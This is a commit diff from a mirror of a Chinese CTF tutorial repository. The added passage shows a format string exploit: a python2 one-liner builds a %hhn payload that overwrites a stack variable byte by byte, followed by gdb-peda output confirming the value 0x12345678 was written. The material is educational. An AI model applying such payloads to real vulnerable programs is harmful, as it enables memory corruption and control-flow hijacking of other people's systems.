mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2024-12-24 19:21:15 +07:00
fix
This commit is contained in:
parent
70fe3201a5
commit
f40c2a69c7
@ -1040,7 +1040,96 @@ gdb-peda$ x/4wb 0xffffd538
|
|||||||
```
|
```
|
||||||
把 `AAAA`、`BBBB`、`CCCC`、`DDDD` 占据的地址分别替换成括号中的值,再适当使用填充字节使 8 字节对齐就可以了。构造输入如下:
|
把 `AAAA`、`BBBB`、`CCCC`、`DDDD` 占据的地址分别替换成括号中的值,再适当使用填充字节使 8 字节对齐就可以了。构造输入如下:
|
||||||
```
|
```
|
||||||
|
$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text
|
||||||
|
```
|
||||||
|
其中前四个部分是 4 个写入地址,占 4*4=16 字节,后面四个部分分别用于写入十六进制数,由于使用了 `hh`,所以只会保留一个字节 `0x78`(16+104=120 -> 0x56)、`0x56`(120+222=342 -> 0x0156 -> 56)、`0x34`(342+222=564 -> 0x0234 -> 0x34)、`0x12`(564+222=786 -> 0x312 -> 0x12)。执行结果如下:
|
||||||
|
```
|
||||||
|
$ gdb -q a.out
|
||||||
|
Reading symbols from a.out...(no debugging symbols found)...done.
|
||||||
|
gdb-peda$ b printf
|
||||||
|
Breakpoint 1 at 0x8048350
|
||||||
|
gdb-peda$ r < text
|
||||||
|
Starting program: /home/firmy/Desktop/RE4B/a.out < text
|
||||||
|
[----------------------------------registers-----------------------------------]
|
||||||
|
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||||
|
EBX: 0x804a000 --> 0x8049f14 --> 0x1
|
||||||
|
ECX: 0x1
|
||||||
|
EDX: 0xf7f9883c --> 0x0
|
||||||
|
ESI: 0xf7f96e68 --> 0x1bad90
|
||||||
|
EDI: 0x0
|
||||||
|
EBP: 0xffffd5f8 --> 0x0
|
||||||
|
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
|
||||||
|
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
|
||||||
|
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
|
||||||
|
[-------------------------------------code-------------------------------------]
|
||||||
|
0xf7e27c1b <fprintf+27>: ret
|
||||||
|
0xf7e27c1c: xchg ax,ax
|
||||||
|
0xf7e27c1e: xchg ax,ax
|
||||||
|
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
|
||||||
|
0xf7e27c25 <printf+5>: add eax,0x16f243
|
||||||
|
0xf7e27c2a <printf+10>: sub esp,0xc
|
||||||
|
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
|
||||||
|
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
|
||||||
|
No argument
|
||||||
|
[------------------------------------stack-------------------------------------]
|
||||||
|
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
|
||||||
|
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||||
|
0008| 0xffffd534 --> 0x1
|
||||||
|
0012| 0xffffd538 --> 0x88888888
|
||||||
|
0016| 0xffffd53c --> 0xffffffff
|
||||||
|
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
|
||||||
|
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||||
|
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
|
||||||
|
[------------------------------------------------------------------------------]
|
||||||
|
Legend: code, data, rodata, value
|
||||||
|
|
||||||
|
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
|
||||||
|
gdb-peda$ x/20x $esp
|
||||||
|
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
|
||||||
|
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
|
||||||
|
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
|
||||||
|
0xffffd55c: 0x00004443 0x00000000 0xffffd538 0xffffd539
|
||||||
|
0xffffd56c: 0xffffd53a 0xffffd53b 0x34303125 0x33312563
|
||||||
|
gdb-peda$ finish
|
||||||
|
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
|
||||||
|
[----------------------------------registers-----------------------------------]
|
||||||
|
EAX: 0x312
|
||||||
|
EBX: 0x804a000 --> 0x8049f14 --> 0x1
|
||||||
|
ECX: 0x0
|
||||||
|
EDX: 0xf7f98830 --> 0x0
|
||||||
|
ESI: 0xf7f96e68 --> 0x1bad90
|
||||||
|
EDI: 0x0
|
||||||
|
EBP: 0xffffd5f8 --> 0x0
|
||||||
|
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||||
|
EIP: 0x8048520 (<main+138>: add esp,0x20)
|
||||||
|
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
|
||||||
|
[-------------------------------------code-------------------------------------]
|
||||||
|
0x8048514 <main+126>: lea eax,[ebp-0x94]
|
||||||
|
0x804851a <main+132>: push eax
|
||||||
|
0x804851b <main+133>: call 0x8048350 <printf@plt>
|
||||||
|
=> 0x8048520 <main+138>: add esp,0x20
|
||||||
|
0x8048523 <main+141>: sub esp,0xc
|
||||||
|
0x8048526 <main+144>: push 0xa
|
||||||
|
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
|
||||||
|
0x804852d <main+151>: add esp,0x10
|
||||||
|
[------------------------------------stack-------------------------------------]
|
||||||
|
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||||
|
0004| 0xffffd534 --> 0x1
|
||||||
|
0008| 0xffffd538 --> 0x12345678
|
||||||
|
0012| 0xffffd53c --> 0xffffffff
|
||||||
|
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
|
||||||
|
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||||
|
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
|
||||||
|
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
|
||||||
|
[------------------------------------------------------------------------------]
|
||||||
|
Legend: code, data, rodata, value
|
||||||
|
0x08048520 in main ()
|
||||||
|
gdb-peda$ x/20x $esp
|
||||||
|
0xffffd530: 0xffffd564 0x00000001 0x12345678 0xffffffff
|
||||||
|
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
|
||||||
|
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
|
||||||
|
0xffffd560: 0x00000000 0xffffd538 0xffffd539 0xffffd53a
|
||||||
|
0xffffd570: 0xffffd53b 0x34303125 0x33312563 0x6e686824
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user